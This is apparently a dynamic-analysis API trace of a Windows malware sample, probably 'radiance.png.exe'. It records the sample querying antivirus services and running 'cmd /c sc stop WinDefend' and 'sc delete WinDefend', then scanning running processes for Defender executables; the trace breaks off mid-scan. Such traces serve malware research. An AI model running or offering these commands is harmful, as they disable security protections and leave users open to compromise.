	[0045.185] GetSystemDirectoryW (in: lpBuffer=0x12ae2c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.185] GetProcessHeap () returned 0x170000
	[0045.185] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x16) returned 0x1b35a0
	[0045.185] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x1b6140
	[0045.188] OpenServiceW (hSCManager=0x1b6140, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0
	[0045.188] CloseServiceHandle (hSCObject=0x1b6140) returned 1
	[0045.188] GetProcessHeap () returned 0x170000
	[0045.188] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x14) returned 0x1b36a0
	[0045.188] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x1b6140
	[0045.189] OpenServiceW (hSCManager=0x1b6140, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x1b6118
	[0045.189] QueryServiceStatusEx (in: hService=0x1b6118, InfoLevel=0x0, lpBuffer=0x12ade8, cbBufSize=0x24, pcbBytesNeeded=0x12ae14 | out: lpBuffer=0x12ade8, pcbBytesNeeded=0x12ae14) returned 1
	[0045.189] CloseServiceHandle (hSCObject=0x1b6118) returned 1
	[0045.190] CloseServiceHandle (hSCObject=0x1b6140) returned 1
	[0045.190] GetProcessHeap () returned 0x170000
	[0045.190] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x10) returned 0x1bfdc0
	[0045.190] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x12adb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ada8 | out: lpCommandLine="/c sc stop WinDefend", lpProcessInformation=0x12ada8*(hProcess=0x100, hThread=0xe0, dwProcessId=0xeb8, dwThreadId=0xebc)) returned 1
	[0045.199] Sleep (dwMilliseconds=0x3e8) 
	[0046.208] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x12adb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ada8 | out: lpCommandLine="/c sc delete WinDefend", lpProcessInformation=0x12ada8*(hProcess=0xf0, hThread=0xe4, dwProcessId=0xedc, dwThreadId=0xee0)) returned 1
	[0046.216] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x1a8
	[0046.232] Process32FirstW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0046.233] lstrcmpiW (lpString1="[System Process]", lpString2="MsMpEng.exe") returned -1
	[0046.233] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0046.235] lstrcmpiW (lpString1="System", lpString2="MsMpEng.exe") returned 1
	[0046.235] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0046.237] lstrcmpiW (lpString1="smss.exe", lpString2="MsMpEng.exe") returned 1
	[0046.237] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0046.238] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1
	[0046.238] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0046.239] lstrcmpiW (lpString1="wininit.exe", lpString2="MsMpEng.exe") returned 1
	[0046.239] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0046.241] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1
	[0046.241] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0046.242] lstrcmpiW (lpString1="winlogon.exe", lpString2="MsMpEng.exe") returned 1
	[0046.242] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0046.243] lstrcmpiW (lpString1="services.exe", lpString2="MsMpEng.exe") returned 1
	[0046.243] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0046.245] lstrcmpiW (lpString1="lsass.exe", lpString2="MsMpEng.exe") returned -1
	[0046.245] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0046.246] lstrcmpiW (lpString1="lsm.exe", lpString2="MsMpEng.exe") returned -1
	[0046.246] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.247] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.247] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.249] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.249] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.250] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.250] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.251] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.251] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.253] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.253] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.254] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.254] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.268] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.268] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0046.269] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MsMpEng.exe") returned 1
	[0046.269] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.270] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.270] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0046.272] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.272] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0046.273] lstrcmpiW (lpString1="taskeng.exe", lpString2="MsMpEng.exe") returned 1
	[0046.273] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0046.274] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.274] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.276] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.276] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0046.278] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="MsMpEng.exe") returned 1
	[0046.278] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0046.279] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MsMpEng.exe") returned 1
	[0046.279] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0046.280] lstrcmpiW (lpString1="dwm.exe", lpString2="MsMpEng.exe") returned -1
	[0046.280] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.281] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1
	[0046.281] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0046.283] lstrcmpiW (lpString1="explorer.exe", lpString2="MsMpEng.exe") returned -1
	[0046.283] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0046.285] lstrcmpiW (lpString1="audiodg.exe", lpString2="MsMpEng.exe") returned -1
	[0046.285] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0046.286] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="MsMpEng.exe") returned 1
	[0046.286] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0046.287] lstrcmpiW (lpString1="shirts_cumshots_compaq.exe", lpString2="MsMpEng.exe") returned 1
	[0046.287] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0046.289] lstrcmpiW (lpString1="league.exe", lpString2="MsMpEng.exe") returned -1
	[0046.289] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0046.290] lstrcmpiW (lpString1="js_sound.exe", lpString2="MsMpEng.exe") returned -1
	[0046.290] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0046.291] lstrcmpiW (lpString1="beast-dry.exe", lpString2="MsMpEng.exe") returned -1
	[0046.291] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0046.292] lstrcmpiW (lpString1="forecastsgeographic.exe", lpString2="MsMpEng.exe") returned -1
	[0046.292] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0046.293] lstrcmpiW (lpString1="reno.exe", lpString2="MsMpEng.exe") returned 1
	[0046.293] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0046.294] lstrcmpiW (lpString1="specreformwear.exe", lpString2="MsMpEng.exe") returned 1
	[0046.294] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0046.296] lstrcmpiW (lpString1="rr_publications.exe", lpString2="MsMpEng.exe") returned 1
	[0046.296] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0046.297] lstrcmpiW (lpString1="solo.exe", lpString2="MsMpEng.exe") returned 1
	[0046.297] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0046.298] lstrcmpiW (lpString1="beam.exe", lpString2="MsMpEng.exe") returned -1
	[0046.298] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0046.299] lstrcmpiW (lpString1="configurations.exe", lpString2="MsMpEng.exe") returned -1
	[0046.299] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0046.300] lstrcmpiW (lpString1="fact-film-anticipated.exe", lpString2="MsMpEng.exe") returned -1
	[0046.300] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0046.301] lstrcmpiW (lpString1="wanting villages.exe", lpString2="MsMpEng.exe") returned 1
	[0046.302] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0046.303] lstrcmpiW (lpString1="engagementresearchersmonkey.exe", lpString2="MsMpEng.exe") returned -1
	[0046.303] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0046.304] lstrcmpiW (lpString1="surgical-marcus.exe", lpString2="MsMpEng.exe") returned 1
	[0046.304] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0046.305] lstrcmpiW (lpString1="iexplore.exe", lpString2="MsMpEng.exe") returned -1
	[0046.305] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0046.307] lstrcmpiW (lpString1="iexplore.exe", lpString2="MsMpEng.exe") returned -1
	[0046.307] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="radiance.png.exe")) returned 1
	[0046.308] lstrcmpiW (lpString1="radiance.png.exe", lpString2="MsMpEng.exe") returned 1
	[0046.308] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd50, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0046.309] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1
	[0046.309] Process32NextW (in: hSnapshot=0x1a8, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd50, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0
	[0046.310] CloseHandle (hObject=0x1a8) returned 1
	[0046.310] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x1d4
	[0046.317] Process32FirstW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0046.318] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCuiL.exe") returned -1
	[0046.318] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0046.320] lstrcmpiW (lpString1="System", lpString2="MSASCuiL.exe") returned 1
	[0046.320] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0046.321] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.321] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0046.322] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.322] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0046.323] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCuiL.exe") returned 1
	[0046.323] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0046.325] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1
	[0046.325] Process32NextW (in: hSnapshot=0x1d4, lppe=0x12abd8 | out: lppe=0x12abd8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0046.326] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCuiL.exe") returned 1
